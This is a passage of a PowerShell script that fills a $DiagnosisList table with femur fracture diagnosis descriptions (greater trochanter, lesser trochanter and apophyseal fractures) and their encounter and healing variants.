fracture of greater trochanter of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of left femur","Nondisplaced fracture of greater trochanter of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of greater trochanter of unspecified femur","Nondisplaced fracture of greater trochanter of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of right femur","Displaced fracture of lesser trochanter of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of left femur","Displaced fracture of lesser trochanter of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lesser trochanter of unspecified femur","Displaced fracture of lesser trochanter of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of right femur","Nondisplaced fracture of lesser trochanter of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of left femur","Nondisplaced fracture of lesser trochanter of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lesser trochanter of unspecified femur","Nondisplaced fracture of lesser trochanter of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of right femur","Displaced apophyseal fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of left femur","Displaced apophyseal fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced apophyseal fracture of unspecified femur","Displaced apophyseal fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right femur","Nondisplaced apophyseal fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced apophyseal fracture of right 